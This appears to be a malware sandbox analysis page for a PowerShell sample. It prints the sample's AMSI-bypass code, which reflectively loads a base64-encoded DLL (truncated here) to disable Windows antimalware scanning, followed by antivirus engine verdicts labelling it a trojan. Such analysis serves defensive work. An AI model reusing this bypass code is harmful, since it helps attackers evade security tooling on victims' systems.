popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
function Bypass-AMSI
if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
[Reflection.Assembly]::Load([Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKJrPYwAAAAAAAAAAOAAIiALATAAAA4AAAAGAAAAAAAAxiwAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAHEsAABPAAAAAEAAAIgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADUKwAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA1AwAAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAIgDAAAAQAAAAAQAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAClLAAAAAAAAEgAAAACAAUAECEAAMQKAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwBACqAAAAAQAAEXIBAABwKAIAAAYKBn4QAAAKKBEAAAosDHITAABwKBIAAAoXKgZyawAAcCgBAAAGCwd+EAAACigRAAAKLAxyiQAAcCgSAAAKFyobaigTAAAKDBYNBwgfQBIDKAMAAAYtDHL9AABwKBIAAAoXKhmNFgAAASX
Write-Output "DLL has been reflected";
[Bypass.AMSI]::Disable()
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Disable.4!c
MicroWorld-eScan Dropped:Trojan.AMSI.Disable.I
CMC Clean
CAT-QuickHeal Clean
Skyhigh PS/Agent.am
McAfee PS/Agent.am
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Script.Save.642442f9
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
ESET-NOD32 a variant of MSIL/Agent.SYI
TrendMicro-HouseCall Clean
Avast PwrSh:AmsiBypass-H [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Dropped:Trojan.AMSI.Disable.I
NANO-Antivirus Clean
ViRobot Clean
Tencent Win32.Trojan.Generic.Gflw
Sophos Clean
F-Secure Trojan.TR/EvaAmsi.G1
DrWeb Clean
VIPRE Dropped:Trojan.AMSI.Disable.I
TrendMicro Clean
Emsisoft Dropped:Trojan.AMSI.Disable.I (B)
GData Dropped:Trojan.AMSI.Disable.I
Jiangmin Clean
Varist Clean
Avira TR/EvaAmsi.G1
Antiy-AVL Trojan[Dropper]/Win32.Agent.a
Kingsoft Script.Ks.Malware.9344
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.AMSI.Disable.I
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Trojan:PowerShell/UnicornBypass.A
Google Detected
AhnLab-V3 Clean
Acronis Clean
ALYac Dropped:Trojan.AMSI.Disable.I
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Trojan.UnicornBypass!8.1066D (TOPIS:E0:RJFMipMVEMJ)
Yandex Clean
Ikarus Trojan-Dropper.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG PwrSh:AmsiBypass-H [Trj]
Panda Clean
No IRMA results available.